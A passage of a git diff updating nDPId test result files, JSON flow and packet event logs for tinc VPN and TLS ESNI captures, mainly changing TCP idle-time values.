-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427717,"flow_last_seen":1495983427717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427717,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1495983427717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427717,"pkt":"ABcILL3nACbGCvpSCABFEAA8vEtAAEAGvw6DcqgbuVPacOds2We5l\/9AAAAAAKACchD0JwAAAgQFtAQCCAp3tTETAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983427744,"flow_last_seen":1495983427744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1495983427744,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1495983427744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1495983427744,"pkt":"ABcILL3nACbGCvpSCABFEAA8k+lAAEAG53CDcqgbuVPacMCK2WgWL9D7AAAAAKACchDyzQAAAgQFtAQCCAoov3nyAAAAAAEDAwc="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1495983427768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427768,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9ln52yg0OtBuZf\/QYASOQhw5gAAAgQFtAEBBAIBAwMH"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1495983427768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427768,"pkt":"ABcILL3nACbGCvpSCABFEAAovExAAEAGvyGDcqgbuVPacOds2We5l\/9BoNDrQlAQAOXp2wAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1495983427794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427794,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9lowIoRT99iFi\/Q\/IASOQgE1gAAAgQFtAEBBAIBAwMH"} 
+00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1495983427794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427794,"pkt":"ABcILL3nACbGCvpSCABFEAAok+pAAEAG54ODcqgbuVPacMCK2WgWL9D8EU\/fY1AQAOV9ywAA"} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":180000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1495983428000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":686,"pkt_l4_len":652,"thread_ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAAKgAABAAEARePuDcqgbuVPacNln2WcCjOIVMnicz9ZajjNEbdb6GxVP+T0CYtKzdvwcc\/GkysPu2p+HyRNKFCh5wNXMj6m9vaZ39wOg\/SFDxkblUqiUmI5T0t6KnEjzK4HfVELTk6MBki+YvI91VjjOz3oekNHxmSbldeRnnKPd925mZ9lxMA3GG9gZmsCSn4wPwr41LS70gLZbanbUNnlN7x6Kh9gVM6JtlzGBIjbSf6B4epOKePy2xW4AQp4bPXtTf\/0OGkPuy5hSETaSFX43lK3JOI2urGuq\/8zhvAyKL4t3LDJwEcTmglCiHm1tbrVnkmBCUBidOZ0NL52X+MKzyHnGOwdAwfV4+3VKFFmQE8IO6WWoZ\/vYOzfj1XZjyXREui0IMCYkWnraOSjlBBxRPQ4DkdgtsHokBlbzUjfr8Ss8XpNaUoZaaRCYy8Kw3szJstqYEU2GPLD0+pg+X9RZcEt+NlU1dFprcf5TwwLwxVrUXlq0UN21vjPNjBpnc4JeghgRv\/VcYRefFyhIUgPMVrdpg5GrCB4JTq65maVpsTyfybYsJ+i42aA3YjBU5z0PIhvBUxoHrj9TxX5OiZvAe42wvflGvW6iHzGGkgjUXDRxjS28FvW05QZJMaG4nQLQu0v8AHNHzQKZciwh33gMV3VVc\/5ghMO+CpJHRRkAZ7mBJzHMFXodcVJsk6K\/2J54sUaiJ48wBzCUQaWI9+w9ancXV2nZd+EHodY95wdzarfbqW8B30M66dRT3RsX8ddjytNxLuW+ewDpuzxP\/dncf+l0Gbul3BZMq9q4XnRT0wDb7bXlR0N7oHMRyWJ2GHC0RV7IQnYGzB\/YDI0StaWXOcSFic4ZA5TwYmSAm0iGFMYJM8DJznOohvp1QzM="} 
00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":180000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
@@ -20,10 +20,10 @@ 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":180000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 02392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1495983428043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAXAAABAADERhNO5U9pwg3KoG9lo2WgFrCCQQfVUKnrm4XUK3wfxxn8qlQ5ZlUxAsin94OmtvvCqeiNDv9hCgysXgIe\/Jwp6foEgyUgSLwbFE+jFX5EiTbzvLxw+eE+9kkIbIypcFMAA862am\/h5EhYX9oyZgZit\/ohLFdBZAd\/9piW+TIg1JYKUHUk24mSNhkzehqNGbaa8v1XNXvCAKUf+je80JL2ztiSjDNtOMrbTSNyuOyDQhbbpaRAakKCJ88rhmRVZWPpGUvSoCLUQLdy+ls4UP9VbLIv60yNlhG\/tIZF+Y9AgYJgNK7469NXCZUoHPgebmwGoSIBvEupGZ2HWMq5tD1YtSNLd5mdcZ4U6bdW57PJT8Mqpobu5nNKCEUTKU8fv54QllT27onCmdTrjSLU7i56qGCPKz8Pmgpd+4MU1sOXlteqk11G5kxvUePU9AHDMWVZcDsBw+8w6+Ab\/JxYo4ilYPsOkX7nL+VL0USjj5AuG8wFeeDnvZeQURQeN12MuZewRpRzkJa5jIqIQqHHvEIR3I+NlcYV0IJXsrpavQ6RSGtYmR7+94hoEShFxTK6D2mPtrdLiAqRfmJptPiSWLm5Mqo0iayfkgY6sd6M1vwIpwRPc0qQOtn1doDjup9IIauyzdANQF9x2voU4Z8dsvHyVyVE9VF\/Qdb\/Bbe15\/vrLpOF+cB00\/TXrJ07AVZHqEwel\/iScs2S9kgqiIjzb1T0G6y8xlHQV7ktrErMlC4GXnRqlxWayYa4G266nN6w
c0wTy9MD7G5DpqxUPZwZIrxZiMHXc4mPXA210XTsNG7LVVQM581lStiGr1a4pUZOImjoO\/gk5frgMuu6jHFgEA+vJuy5sW5lQpb37IXQqFXKKxN2z8Ke+x4zy7ALHVigelzuNCf3HZfol1uD4eeP+2tpVITMiH4O5PCcLDMT1yYFhbvLg8pREkBITQB+rUBzFhHXEVteh6noPH6hIRkDIrLyfEHdswFs6MATwSlSxKkz0QuaSV8BEXCeHOM+JmmNRCgSmcHuzwrDdDGG7eSF7kzVOXV4KPQtBdbB4rq\/rFfGJFSiBXn2huFIeNdQhj4gFtDQIfYjXMsmhSsrScwjLj7C7jg2Rwm\/XuhfLgws3rBZC6s4ClAl8Lku7gDzAWOdYgK2FafJmEnZR3NXAFEI8JF5r5ITwwBATJADMcv7GO51VLOgFAuacu5w0kk1gxapzbHcSOdPeKJB+9voPecizTzqOKMuqIngnpb\/qfLXWqnLz7U6\/\/ui4aHgWF+lKp0xsjiPYD9YnVxFJE08oruybimAl5F4KHctwad6wrnqDh7AMDE3spgEO04z6pL2VZXL\/wvq6pxHL80kORMsGZgPOmyHtPCRE5Jd+RFgmwBejwRrNJFCuLc2P622GjZ1t\/hPuud14khvjnfHdyfKsl19iLyzwv7qu0oEoiwBrYf06g7MzcULZl4XUxJNSE9RYU15rJmRxguh4eXuIOqgIqrfkbI\/\/vDyBWYyc45utTloDIm+GnDiAeigtPF4FijLPE9qVDfQilPuHMnf6UDvllbgNqo19g3gnmLroqXep+7LyRYp4sWr4\/d\/TZKaCucaaCwVm1u\/1te\/n+aOftes5xygxK+OaKehbJ47nnj4GJRcueg7KFHNq2ES0Uj1Rh2+lhguZLWYwLh4\/FPK0vdBcca9l29F4kxSaDHn6BeoZpX+wivGn5jMTbID2EPugYpELm+yXQDHU1W7JBJkdRRhJfBWIKo8UZofXK4qgL2\/MqCqF2T2\/hEjt9sAO7DVGx2T23++65+kzCDH2qiAfrQdQFlN08V17FGkydmcJibPSSbSe7aLjPjiXuGdc7ip\/LMmiTS0sCJq6zHCBk5aHilHCEqmTl+eL9Q9vwrMeAdX+cTIhD7xTxK6aeGzriTEJFQi6+ZDkO2+SfJZlZhRSLhc55JEaOH4LdN2VABhAfw=="} 
01675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1495983428043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":958,"pkt_l4_len":924,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAOwAABAADERhuO5U9pwg3KoG9lo2WgDnO+CxkvMU5czu375VqRfqLEu7HGryDGh\/bfeaQJnEYyovrmntDxt74C8PKQJMHvY4MA1ZHuHhnLJLLc7h764zEbGLw\/vzqsaP4XOJmX3J5ZoXTmAMsXnjvJUPqVeWdg0PXJhqa6st9hNynxv5D0rpJqm0\/zV192qcE59jCUVvmB8PfyMGzNb8iu7j79YvIHCzFHzmycvx5sIdKuzv+9aaD2+9O1fWAuPwq8\/8DIg8DeQB7htbL3\/j6lwDGupSOVHCsI1+lYyNr8A5\/OFujJsJCBzKGXQVn+oJRoQMsFgr0giRTOfhVQb+GlZOLXTcVvxl6mNiWSoDQXoxAfPuixrlp8F\/MUrFtVqJYJIqlWUSZ0FHJzKiXJ5yQvwNmnsvYHqMQNW6ZCn++1tGEto8r5tq\/BDe0FvMAOQC\/Iq49d9xjtHRJaZkPSuUT0Ue8\/0Y0g7e7MLBCNRDp3pFvP\/SDROeSBv+1Hrsd3VgZ3eZsdET6SE7O+jiB1npy8XRuCERu\/h5FlX8FbvbKHJP4IXbapoGYosv9tEU2XONo65wz3MCF\/bVbrUPcOASb6j+c55C5rFZMKjA9llC2lki+5ox8NX3C0rsVb9ezbzAq4pvwBxx6yeMVlmBhRxjwXLWviN6bjb8+kKUMxdeqvtFZ90hWLG3av8x5N1D1shhjp\/Pkh3vfzESwJoedvps7xxuR16c9ku4Rlje1SzPbiXWLLd2ctB3NoWHVeTFrvLRU2yqM5LNXQpjLOWYVqndimokWzm3PvfsX2+ickLKvqhiNB8NMbCQKKllVtQtaf37M0W3hxij8fNqkfQ3Dwvv36xYQY6aA2cxZJ7cAJfgWt3+2IqzsbQ\/hOa1lDnl8uliASJ4hjXOWhi4prZ86H1uoSeDR53SAlBdMQQ3YoaLSv6kQQOXAUwHuZQi7+x\/RE5HfoAvVeNzG90OcOnL2uiCxjhyp3\/swc9NGfoqhpvTPlS\/HF6E4gzQu+uwm3Kmj7AsKixik3ciIBb6VqLoyiaQR35wKSQydm3qyc2A8RxVwJEHM9ChZNid+PGF9MC3cdjsTP6IG4AOw3VS8jLQznT38vyJvgWelWwQ+I9gJ2zh8MbfaLP+EWNQPI478wMYlCsuyg5uNNDg0lSF1epToqo6+lky+h2nAa21hKOviRtVRN8LV88QPWbYJx4n3gM4sg9yVPde6y+bdl\/hYGe1J5JIAW7OGyTqN+C43dvapKXMw=="} 
-00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
-00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","packets-captured":317,"packets-processed":317,"total-skipped-flows":0,"total-l4-data-len":338229,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1495983475109} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 317/317 diff --git a/test/results/tls-esni-fuzzed.pcap.out b/test/results/tls-esni-fuzzed.pcap.out index 4a224bd12..79934b065 100644 --- a/test/results/tls-esni-fuzzed.pcap.out +++ b/test/results/tls-esni-fuzzed.pcap.out 
@@ -1,17 +1,17 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": 
